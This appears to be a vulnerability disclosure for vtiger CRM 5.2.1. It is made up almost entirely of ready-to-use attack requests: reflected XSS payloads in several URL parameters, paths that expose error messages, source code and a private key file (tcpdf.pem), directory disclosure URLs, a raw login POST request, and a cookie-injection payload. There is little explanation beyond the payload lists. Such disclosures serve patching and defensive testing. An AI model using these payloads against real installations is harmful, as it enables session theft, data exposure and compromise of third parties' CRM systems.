vtiger CRM 5.2.1 XSS

XSS

/include/SalesPlatform/NetIDNA/example.php/>"><ScRiPt>alert(14227)</ScRiPt>


decoded

/include/SalesPlatform/NetIDNA/example.php?decoded=%22%20onmouseover%3dprompt%28981290%29%20bad%3d%22&encode=Encode%20%3e%3e&idn_version=2003


encoded

/include/SalesPlatform/NetIDNA/example.php?decode=%3c%3c%20Decode&encoded=%22%20onmouseover%3dprompt%28937322%29%20bad%3d%22


lang


/include/SalesPlatform/NetIDNA/example.php?decode=&encode=&idn_version=&lang=%22%20onmouseover%3dprompt%28959182%29%20bad%3d%22


_operation

/modules/Mobile/index.php?_operation=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28922731%29%3c%2fScRiPt%3e


service

/vtigerservice.php?service=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28945713%29%3c%2fScRiPt%3e



Application error message

display_errors = 1

/modules/Settings/SettingsAjax.php?announce_save=&file=&orgajax=268435455
/index.php 
/include/HTTP_Session/Session/Container/MDB2.php
/modules/Reports/SaveReport0.php
/cron/modules/PBXManager/AsteriskClient.php
/include/tcpdf/test_old.php
/include/tcpdf/test_unicode.php
/log4php.debug/layouts/LoggerLayoutHtml.php
/log4php.debug/LoggerBasicConfigurator.php
/log4php.debug/LoggerCategory.php
/log4php.debug/LoggerManager.php
/log4php.debug/spi/LoggerLoggingEvent.php
/log4php.debug/xml/LoggerDOMConfigurator.php
/modules/Home/UnifiedSearchModules.php
/modules/Migration/deleteCustomFields.php
/modules/RecycleBin/EmptyRecyclebin.php
/modules/SMSNotifier/sendsmsButton.php
/modules/Users/SaveDefModuleView.php
/modules/Accounts/MailerExport.php 
/modules/Emails/ 
/modules/Emails/index.php 
/modules/Emails/gotodownload.php
/modules/Emails/templates/testemailtemplateusage.php
/modules/Rss/index.php 
/modules/Settings/index.php 
/modules/Settings/SaveAuditTrail.php
/modules/Settings/ModuleManager.php 
/modules/Settings/ModuleManager/Export.php 
/modules/Settings/SaveEnableBackup.php 
/modules/Settings/SettingsAjax.php 
/modules/Webmails/ 
/modules/Webmails/index.php 
/modules/Webmails/ListViewAjax.php 
/Popup.php 
/vtigerservice.php 


Source code disclosure


/cron/MailScanner.service
/cron/modules/com_vtiger_workflow/com_vtiger_workflow.service
/cron/modules/SalesOrder/RecurringInvoice.service
/cron/modules/VtigerBackup/VtigerBackup.service
/cron/README-NewCronServiceSetup.txt
/include/ComboStrings.php_TODO
/include/events/include.inc
/include/events/SqlResultIterator.inc
/include/events/VTEntityData.inc
/include/events/VTEntityType.inc
/include/events/VTEventHandler.inc
/include/events/VTEventsManager.inc
/include/events/VTEventTrigger.inc
/include/events/VTWSEntityType.inc
/include/htmlpurifier/INSTALL
/include/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Filter.ExtractStyleBlocks.txt
/include/magpierss/rss_cache.inc
/include/magpierss/rss_fetch.inc
/include/magpierss/rss_parse.inc
/include/magpierss/rss_utils.inc
/include/phputf8/README
/include/prototype-1.4.0/src/HEADER
/include/SalesPlatform/NetIDNA/ReadMe.txt
/include/tcpdf/fonts/ttf2ufm/ttf2ufm-src/app/TeX/cjk-latex-config
/include/tcpdf/fonts/ttf2ufm/ttf2ufm-src/app/TeX/sfd2map
/include/tcpdf/fonts/ttf2ufm/ttf2ufm-src/other/cntstems.pl
/include/tcpdf/fonts/ttf2ufm/ttf2ufm-src/other/lst.pl
/include/tcpdf/fonts/ttf2ufm/ttf2ufm-src/other/showdf
/include/tcpdf/fonts/ttf2ufm/ttf2ufm-src/other/showg
/include/tcpdf/fonts/ttf2ufm/ttf2ufm-src/scripts/forceiso
/include/tcpdf/fonts/ttf2ufm/ttf2ufm-src/scripts/frommap
/include/tcpdf/fonts/ttf2ufm/ttf2ufm-src/scripts/html2man
/include/tcpdf/fonts/ttf2ufm/ttf2ufm-src/scripts/inst_dir
/include/tcpdf/fonts/ttf2ufm/ttf2ufm-src/scripts/t1fdir
/include/tcpdf/fonts/ttf2ufm/ttf2ufm-src/scripts/trans
/modules/com_vtiger_workflow/include.inc
/modules/com_vtiger_workflow/tasks/VTChangeFieldValueTask.inc
/modules/com_vtiger_workflow/tasks/VTChangeOwnerTask.inc
/modules/com_vtiger_workflow/tasks/VTCreateEntityTask.inc
/modules/com_vtiger_workflow/tasks/VTCreateEventTask.inc
/modules/com_vtiger_workflow/tasks/VTCreateTodoTask.inc
/modules/com_vtiger_workflow/tasks/VTDummyTask.inc
/modules/com_vtiger_workflow/tasks/VTEmailTask.inc
/modules/com_vtiger_workflow/tasks/VTEntityMethodTask.inc
/modules/com_vtiger_workflow/tasks/VTRepeatableTask.inc
/modules/com_vtiger_workflow/tasks/VTSMSTask.inc
/modules/com_vtiger_workflow/VTConditionalExpression.inc
/modules/com_vtiger_workflow/VTEmailRecipientsTemplate.inc
/modules/com_vtiger_workflow/VTEntityCache.inc
/modules/com_vtiger_workflow/VTEntityMethodManager.inc
/modules/com_vtiger_workflow/VTEventHandler.inc
/modules/com_vtiger_workflow/VTJsonCondition.inc
/modules/com_vtiger_workflow/VTSimpleTemplate.inc
/modules/com_vtiger_workflow/VTTaskManager.inc
/modules/com_vtiger_workflow/VTTaskQueue.inc
/modules/com_vtiger_workflow/VTWorkflowApplication.inc
/modules/com_vtiger_workflow/VTWorkflowManager.inc
/modules/com_vtiger_workflow/VTWorkflowTemplateManager.inc
/modules/FieldFormulas/expression_engine/include.inc
/modules/FieldFormulas/expression_engine/VTExpressionEngine.inc
/modules/FieldFormulas/expression_engine/VTExpressionEvaluater.inc
/modules/FieldFormulas/expression_engine/VTParser.inc
/modules/FieldFormulas/expression_engine/VTTokenizer.inc
/modules/FieldFormulas/include.inc
/modules/FieldFormulas/VTFieldFormulasEventHandler.inc
/modules/FieldFormulas/VTModuleExpressionsManager.inc
/modules/Migration/ResetPassword.phpfile
/modules/Users/ShowHistory.html
/vtlib/thirdparty/parser/feed/simplepie.inc


Private key file
/include/tcpdf/tcpdf.pem


Directory disclosure



/include/HTTP_Session/Session/Container/MDB2.php
/modules/Reports/SaveReport0.php

/cron/modules/PBXManager/AsteriskClient.php
/modules/Emails/gotodownload.php
/modules/Emails/gotodownload.php?msgno=&download=test@himic.ru&file=test@himic.ru
/modules/Emails/gotodownload.php?msgno=test@himic.ru&download=&file=test@himic.ru
/modules/Emails/gotodownload.php?msgno=test@himic.ru&download=test@himic.ru&file=
/modules/Settings/SaveEnableBackup.php?enable_ftp_backup=&GetBackupDetail=test@himic.ru&enable_local_backup=test@himic.ru
/modules/Settings/SaveEnableBackup.php?enable_ftp_backup=test@himic.ru&GetBackupDetail=&enable_local_backup=test@himic.ru
/modules/Settings/SaveEnableBackup.php?enable_ftp_backup=test@himic.ru&GetBackupDetail=test@himic.ru&enable_local_backup=
/vtigerservice.php?service=wordplugin&wsdl=
/vtigerservice.php?service=wordplugin&fieldval=&wsdl=test@himic.ru


POST /index.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.8.131 Version/11.11
Host: .ru
Content-Length: 203
Cookie: PHPSESSID=99ddd77ca31c62947912c713bda69b09
Connection: Close
Pragma: no-cache

module=268435455&action=Authenticate&return_module=Users&return_action=Login&user_name=test@himic.ru&user_password=test@himic.ru&login_theme=alphagrey&login_language=en_us


Cookie manipulation

/modules/Mobile/index.php?_operation=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'>
